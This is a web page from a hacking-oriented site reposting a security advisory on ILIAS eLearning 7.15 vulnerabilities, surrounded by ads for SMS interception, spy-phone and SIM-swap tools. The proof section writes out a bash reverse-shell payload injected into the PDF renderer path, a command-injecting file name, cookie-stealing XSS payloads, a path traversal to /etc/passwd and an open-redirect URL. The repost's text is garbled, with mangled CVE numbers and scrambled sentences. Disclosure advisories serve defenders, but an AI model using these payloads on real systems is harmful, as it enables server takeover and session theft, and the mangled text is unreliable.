• Advertise
  • SS7 Hacking
Saturday, February 4, 2023
No Result
View All Result
I Need Hack - Hacking Tutorials, News, Tips
  • Home
  • Exploits

    Lenovo Diagnostics Driver Memory Access

    macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

    F5 Big-IP Create Administrative User

    Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

    Packet Storm New Exploits For January, 2023

    io_uring Same Type Object Reuse Privilege Escalation

    vmwgfx Driver File Descriptor Handling Privilege Escalation

    eCommerce Marketplace Platform CMS 1.7 SQL Injection

    eCommerce Marketplace Platform CMS 1.7 Cross Site Scripting

    Trending Tags

    • sms exploit
    • ss7 software
    • simswap software
    • jpg exploit
    • kali linux
  • Hacking News
    Malicious Reward Apps Trick Over 2 Million Android Users

    Malicious Reward Apps Trick Over 2 Million Android Users

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    TROJANPUZZLE Attack Forces AI Assistants to Suggest Rogue Coding

    Multiple Vulnerabilities Found In Samsung Galaxy App Store App

    Researchers Find Class Pollution-A Prototype Pollution Variant That Affects Python

    Be on the lookout for this AnyDesk Phishing campaign that delivers Vidar info stealer

  • Hacking Tools

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

    Trending Tags

    • hacking tools
    • hacking software
    • hacking tips
    • ss7 attacks
    • simswap software
    • sms exploit
  • Hacking Tutorials

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

  • Kali Linux
    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    The Terminal Application Cypherhound contains 260+ Neo4j Cyphers for BloodHound DataSets

    Subparse: Modular Malware Analysis Artifact Collection And Correlation Framework

    Should South East Asian Tech Startups Consider Outsourcing Support?

    Should South East Asian Tech Startups Consider Outsourcing Support?

    AzureHound : Azure Data Exporter For BloodHound

    Xerror is an automated penetration testing tool with GUI

    Mongoaudit is an audit and pentesting tool for MongoDB databases

    Trending Tags

    • kali linux
    • kali tools
    • hacking tools kali
    • kali hacking
    • pentesting
  • Security
    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    EV Charging Stations at Risk of DoS Attacks

    EV Charging Stations at Risk of DoS Attacks

    Most Important Computer Forensics Tools for 2023

    Most Important Computer Forensics Tools for 2023

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    What is an OSINT Tool – Best OSINT Tools 2023

    What is an OSINT Tool – Best OSINT Tools 2023

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

  • Advertise
  • Home
  • Exploits

    Lenovo Diagnostics Driver Memory Access

    macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

    F5 Big-IP Create Administrative User

    Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

    Packet Storm New Exploits For January, 2023

    io_uring Same Type Object Reuse Privilege Escalation

    vmwgfx Driver File Descriptor Handling Privilege Escalation

    eCommerce Marketplace Platform CMS 1.7 SQL Injection

    eCommerce Marketplace Platform CMS 1.7 Cross Site Scripting

    Trending Tags

    • sms exploit
    • ss7 software
    • simswap software
    • jpg exploit
    • kali linux
  • Hacking News
    Malicious Reward Apps Trick Over 2 Million Android Users

    Malicious Reward Apps Trick Over 2 Million Android Users

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    TROJANPUZZLE Attack Forces AI Assistants to Suggest Rogue Coding

    Multiple Vulnerabilities Found In Samsung Galaxy App Store App

    Researchers Find Class Pollution-A Prototype Pollution Variant That Affects Python

    Be on the lookout for this AnyDesk Phishing campaign that delivers Vidar info stealer

  • Hacking Tools

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

    Trending Tags

    • hacking tools
    • hacking software
    • hacking tips
    • ss7 attacks
    • simswap software
    • sms exploit
  • Hacking Tutorials

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

  • Kali Linux
    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    The Terminal Application Cypherhound contains 260+ Neo4j Cyphers for BloodHound DataSets

    Subparse: Modular Malware Analysis Artifact Collection And Correlation Framework

    Should South East Asian Tech Startups Consider Outsourcing Support?

    Should South East Asian Tech Startups Consider Outsourcing Support?

    AzureHound : Azure Data Exporter For BloodHound

    Xerror is an automated penetration testing tool with GUI

    Mongoaudit is an audit and pentesting tool for MongoDB databases

    Trending Tags

    • kali linux
    • kali tools
    • hacking tools kali
    • kali hacking
    • pentesting
  • Security
    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    EV Charging Stations at Risk of DoS Attacks

    EV Charging Stations at Risk of DoS Attacks

    Most Important Computer Forensics Tools for 2023

    Most Important Computer Forensics Tools for 2023

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    What is an OSINT Tool – Best OSINT Tools 2023

    What is an OSINT Tool – Best OSINT Tools 2023

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

  • Advertise
No Result
View All Result
I Need Hack - Hacking Tutorials, News, Tips
SS7 SMS Intercept SS7 SMS Intercept SS7 SMS Intercept
Home Exploits

ILIAS eLearning 7.15 Command injection / XSS / FI / OpenRedirect

by Ineedhack
December 9, 2022
in Exploits
0
79
SHARES
493
VIEWS
Share on FacebookShare on Twitter
Kripkey Spy Phone Kripkey Spy Phone Kripkey Spy Phone

SEC Consult Vulnerability Lab Security Advisory 20221206-0
=======================================================================

Title: Many critical vulnerabilities

Product: ILIAS ELearning Platform

vulnerable version: <= 7.15

Fixed version 7.16

CVE numbers: CVE-202-25915, CVE-202-25916, and CVE-202-25917.

CVE-2022-45918

Impact is critical

homepage: https://www.ilias.de

found: 2022-09-30

by: Anna Hartig (Office Bochum)

Constantin Schwarz (Office Bochum)

Niklas Schilling (Office Munich)

SEC Consult Vulnerability Lab

A part of SEC Consult is an Atos company.

Asia

https://www.sec-consult.com

=======================================================================

Vendor description:

——————-

ILIAS has been around since 1998. It is an effective learning management system which fulfills all of your needs.

All your needs. It integrates tools for small and large companies.

Universities, schools, and the public sector can create custom,

individual learning scenarios.”

Source: https://www.ilias.de/en/

Recommendations for businesses:

————————

A patch is provided by the vendor and should be applied immediately.

SEC Consult strongly recommends that you conduct a comprehensive security assessment of your product

Security professionals are trained to find and solve potential problems.

Security issues

Vulnerability overview/description:

———————————–

1) Authenticated Direct OS Command Injection – CVE-202-25915

ILIAS uses several third-party software to complete tasks such as creating PDFs

scan uploaded files to identify viruses. They are known as using the

PHP exec() function. The arguments that are passed to the function exec() may be different in some cases.

Functions can contain input from users that has not been properly cleaned.

You can make a dangerous mistake by uploading files or performing malign configurations.

An attacker could execute system commands without the permissions of the web host

User (www-data).

This privilege is required to access the various command injection examples

From low rights to administration rights.

2) CVE-20222-45916 – Stored Cross-Site scripting

ILIAS identified multiple cross-site scripting vulnerabilities that could be stored.

Course items They were achieved either by bypassing existing XSS filter or

Simply by using the missing input validation entirely. The result is the

The user’s browser executes attacker-controlled JavaScript codes.

An attacker must have the ability to create course materials, such as tutoring a student.

course.

3. Local File Inclusion-CVE-2022-45918

A debugger is included in the SCORM editor. This gives authors insight into

The current session of SCORM Player, and all previous sessions. Accessing

The logs from previous sessions show that the debugger failed to verify the request.

File path allows for filesystem access at will.

4) Open Redirect CVE-202-25917

Function shib_logout.php redirects user to URL.

“return” parameter. An attacker could use this parameter, since it isn’t validated.

It can be used to redirect victims to arbitrary websites. It is an extremely powerful tool.

Phishing campaigns are a way to hide malicious websites behind links.

It looks as though it would lead you to the actual ILIAS website.

The proof:

—————–

1) Authenticated Direct OS Command Injection – CVE-202-25915

Numerous command injection vulnerabilities have been identified in multiple instances

Upload a ZIP archive

Users with normal assessments may submit their solutions by uploading a ZIP

archive. Archive are downloaded to the server, and then scanned for viruses

recursively. An attacker can use the directory and file name to inject.

System commands can be included, such as the include of a directory with name

$(touch/tmp/pwned to open the ZIP archive An attacker can exploit this vulnerability.

Is able to obtain a reverse shell from the ILIAS websiteserver using the rights of

web server user (www-data).

b) Creation of media objects

ILIAS can also be set up so users can create media objects from files

Inside an “Upload directory”. These files must be created before these objects can be used.

Scanned for viruses An attacker can use the file names to inject malware into your system.

commands. You can place a file named $(touch/tmp/pwned inside

Upload directory, then create a media object from it. An attacker can be

With the right to www-data, you can execute system commands.

server.

c) Creation of PDF documents

ILIAS allows users to export their content as PDF files. An user

Administrator rights allow you to configure the path for the PDF rendering program of your choice. An

This parameter can be used by an attacker to infect system commands. Because of missing

It is possible to insert multiple commands after validation. You can follow this path:

ILIAS requires that wkhtmltopdf be part of the payload. You can find it here.

Change the way to:

/usr/local/bin/wkhtmltopdf; bash -c “bash -i >& /dev/tcp//13373 0>&1”;

An attacker could open a reverse-shell with www-data rights that connects

Port 13373 to the machine of an attacker. When the attacker’s machine on port 13373 is attacked, initiate the reverse shell.

The export function has been activated.

This vulnerability can be exploited without the need to install a PDF renderer.

2) CVE-20222-45916 – Stored Cross-Site scripting

Numerous instances of cross-site stored scripting have been identified.

a) Several stored XSS attacks in tests

A JavaScript attacker should be capable of creating new JavaScript tests.

embeddable. The XSS payload is activated if the victim later accesses any of these tests.

activated. A filter is placed in the “Question” input field for a test.

Correctly remove HTML tags like script>

. Use half-open HTML

This filter is easily bypassed by using tags E.g.

<img src="x" onerror="alert(document.cookie)"

You can use this HTML tag in an “Introductory message” section of your test.

To trigger an XSS. End the JavaScript code by putting a quotation

Mark or Space, used to separate the HTML tag from subsequent HTML tags.

Incorporated into a test

The “Question” input field for the question type “Long Menu”, was finally activated.

It was found that there is no filtering, which allows for unrestricted access to the data.

You can use any HTML tag, such as “script”

b) Title of courses items: Stored XSS

A stored item may be accessed by an attacker who has the right to make an arbitrarily designed course.

XSS Attack by changing the title to the element

” onclick=”alert(document.cookie)”

Clicking on the button right above the title will bring up the XSS Payload.

triggered.

c) HTML Sites Stored XSS

A stored attack can be conducted by an attacker who has the rights to modify a HTML Learning Module.

XSS Attack, because it’s allowed to add JavaScript Code to the HTML pages. Even

If this is intentional, it can be considered insecure behavior and a bad habit.

3. Local File Inclusion-CVE-2022-45918

The SCORM Debugger needs to be activated for all ILIAS.

platform. A SCORM attacker can access the SCORM Player.

Debug and ask for the logs from a prior session. You can change the value of

The “logFile query parameter” of the request can be used to read any number

Files of the filesystem on the server. To read, for example, the passwd files

An attacker could alter the logfile parameter value on Linux systems

to “../../../../../../../../../etc/passwd”.

4) Open Redirect CVE-202-25917

Open redirection is possible with the shib_logout function.

This vulnerability is successfully used to redirect URLs

“https://www.sec-consult.com” is:

http://ILIAS-URL/shib_logout.php?action=logout&return=https://www.sec-consult.com

Versions that are vulnerable or tested:

—————————–

These vulnerabilities were discovered in ILIAS Version 7.14.

A quick analysis of the source code shows that there are several

Versions older than 3.8.4 have vulnerabilities.

It is therefore assumed that all current products are affected.

Version 7.15 partially fixed the vulnerabilities. A complete patch is available.

Version 7.16 is available.

Vendor contact timeline:

————————

2022-10-07: Contacting vendor through [email protected]

2022-10-19

2022-10-25 – Extend email recipients to [email protected] or [email protected]

The vendor’s website provided personal email addresses.

2022-10-25: Sending an advisory to the contact provided

2022-10-30: More information requested by the Vendor

2022-10-31: Sending detailed PoC

2022-11-10: Interested in current status

2022-11-22: Vendor confirms availability of patches by 2022-11-25

2022-11-22: Interested in the versions of patches mentioned and CVE IDs

2022-11/23: Vendor gives information on patched version; CVE IDs to be

SEC Consult

2022-11-24: Vendor issues patched version 7.16

2022-12-06 : Public Release of Security Advisory

Solution:

———

Download ILIAS version 7.16 and higher from the vendor’s site:

https://docu.ilias.de/goto.php?target=st_229

Workaround:

———–

None

Contact Us:

————-

https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult is an Atos Company

Asia

SEC Consult Vulnerability Lab

SEC Consult Vulnerability Lab, which is part of SEC Consult.

Atos company. SEC Consult continues to gain knowledge through this.

The attacker must be kept in the forefront of application and network security. You can find the following:

SEC Consult Vulnerability Lab offers high-quality penetration testing.

Evaluation of offensive and defensive technology for customers.

Our customers receive the latest information on vulnerabilities.

a valid recommendation on the risk profile for new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Are you interested in working with SEC Consult’s experts?

Send us your application https://sec-consult.com/career/

SEC Consult experts can help you improve your cyber security.

Contact our local offices https://sec-consult.com/contact/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Send mail to [email protected] Dot com

Web: https://www.sec-consult.com

Blog: http://blog.sec-consult.com

Twitter: https://twitter.com/sec_consult

EOF A. Hartig, C. Schwarz, N. Schilling / @2022

Tags: hack newshacking softwarehacking tipshacking toolshacking tutorialsinstagram hackjpg exploitsms exploit
Ineedhack

Ineedhack

Next Post

Cyber Security firm CloudSEK points fingers at rival over breach

Sim Swap Software Sim Swap Software Sim Swap Software

Recommended

Microsoft Outlook 2019 16.0.13231.20262 Remote code execution

3 months ago

Jettweb Ready Rent A car Script 4 Cross Site

2 weeks ago

Popular News

    • Advertise
    • SS7 Hacking

    ©2017- 2022 Hacking Tutorials

    No Result
    View All Result
    • Home
    • Exploits
    • Hacking News
    • Hacking Tools
    • Hacking Tutorials
    • Kali Linux
    • Security
    • Advertise